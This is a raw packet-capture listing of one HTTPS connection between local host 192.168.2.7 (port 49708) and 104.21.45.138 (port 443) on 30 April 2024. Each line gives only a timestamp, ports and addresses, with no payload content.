Apr 30, 2024 07:59:36.469002008 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.469047070 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.469055891 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.469095945 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.469881058 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.469894886 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.469974041 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.469981909 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.470841885 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.470865011 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.470906019 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.470913887 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.470940113 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.471766949 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.471781969 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.471822977 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.471831083 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.471873045 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.472773075 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.472793102 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.472841978 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.472850084 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.472882032 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.473624945 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.473639011 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.473702908 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.473711014 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.474623919 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.474642992 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.474706888 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.474706888 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.474715948 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.475533009 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.475545883 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.475591898 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.475600004 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.476435900 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.476453066 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.476488113 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.476496935 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.476515055 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.477328062 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.477343082 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.477401018 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.477408886 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.478416920 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.478435040 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.478480101 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.478487015 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.478511095 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.479221106 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.479234934 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.479281902 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.479290009 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.480086088 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.480112076 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.480134010 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.480142117 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.480168104 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.481019020 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.481031895 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.481095076 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.481101990 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.481890917 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.481913090 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.481987953 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.481987953 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.481996059 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.482805967 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.482819080 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.482877016 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.482883930 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.483709097 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.483726978 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.483764887 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.483772993 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.483849049 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.484632969 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.484652996 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.484771013 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.484781981 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.485562086 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.485579014 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.485615015 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.485625982 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.485663891 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.486394882 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.486424923 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.486465931 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.486474991 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.486495972 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.487267971 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.487287045 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.487340927 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.487346888 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.487355947 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.487823963 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.488205910 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.488220930 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.488276958 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.488282919 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.488357067 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.489145041 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.489161968 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.489232063 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.489232063 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.489239931 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.490067005 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.490081072 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.490181923 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.490191936 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.490930080 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.490947962 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.490992069 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.491014004 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.491029024 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.491780043 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.491791964 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.491945028 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.491954088 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.492667913 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.492698908 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.492763996 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.492772102 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.493627071 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.493639946 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.493704081 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.493704081 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.493721008 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.494359970 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.494379044 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.494417906 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.494426012 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.494513035 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.495234966 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.495249033 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.495302916 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.495310068 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.495316982 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.495332003 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.495342970 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.495377064 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.495384932 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.495402098 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.495451927 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.496377945 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.496408939 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.496445894 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.496452093 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.496509075 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.496509075 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.497370958 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.497394085 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.497450113 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.497458935 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.497471094 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.497499943 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.497508049 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.497514963 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.497543097 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.498364925 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.498382092 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.498440981 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.498447895 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.498492002 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.499279976 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.499295950 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.499382019 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.499399900 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.499408960 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.499460936 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.499510050 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.500484943 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.500499010 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.500580072 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.500591040 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.501260996 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.501280069 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.501336098 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.501343012 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.501377106 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.501997948 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.502012968 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.502078056 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.502087116 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.502804041 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.502834082 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.502863884 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.502880096 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.502898932 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.503067017 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.503082991 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.503115892 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.503123999 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.503154993 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.503989935 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.504009008 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.504086018 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.504086018 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.504092932 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.504865885 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.504880905 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.504957914 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.504957914 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.504966021 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.505628109 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.505651951 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.505712986 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.505712986 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.505726099 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.505755901 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.505755901 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.505762100 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.505825996 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.505831957 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.505863905 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.505902052 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.506686926 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.506705046 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.506772041 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.506778955 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.506872892 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.507425070 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.507445097 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.507524014 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.507531881 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.507602930 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.507663012 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.507672071 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.507750034 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.507757902 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.507819891 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.508498907 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.508513927 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.508563042 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.508568048 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.508625984 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.509424925 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.509440899 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.509485960 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.509491920 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.509527922 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.509552956 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.510134935 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.510149956 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.510195017 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.510220051 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.510221958 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.510234118 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.510263920 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.510303020 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.511162043 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.511176109 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.511233091 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.511239052 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.511302948 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.512000084 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.512042999 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.512058973 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.512119055 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.512124062 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.512135983 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.512156963 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.512192965 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.512219906 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.512224913 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.512392044 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.513066053 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.513079882 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.513169050 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.513169050 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.513175964 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.513967991 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.513986111 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.514074087 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.514074087 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.514081955 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.514590979 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.514605999 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.514719963 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.514728069 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.515472889 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.515492916 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.515527010 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.515535116 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.515624046 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.515671015 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.515685081 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.515737057 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.515746117 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.516511917 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.516531944 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.516577005 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.516587019 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.516617060 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.517729998 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.517748117 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.517786026 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.517803907 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.517807961 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.517827034 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.517868996 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.517910957 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.519026995 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.519041061 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.519112110 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.519119978 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.519201040 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.520385981 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.520401955 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.520494938 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.520503044 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.520843029 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.520927906 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.520941973 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.521012068 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.521018982 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.521096945 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.521209955 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.521224022 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.521317005 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.521323919 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.521465063 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.521765947 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.521784067 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.521855116 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.521855116 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.521861076 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.521928072 CEST	49708	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:36.521970987 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.521984100 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.522030115 CEST	443	49708	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:36.522037029 CEST	49708	443	192.168.2.7	104.21.45.138
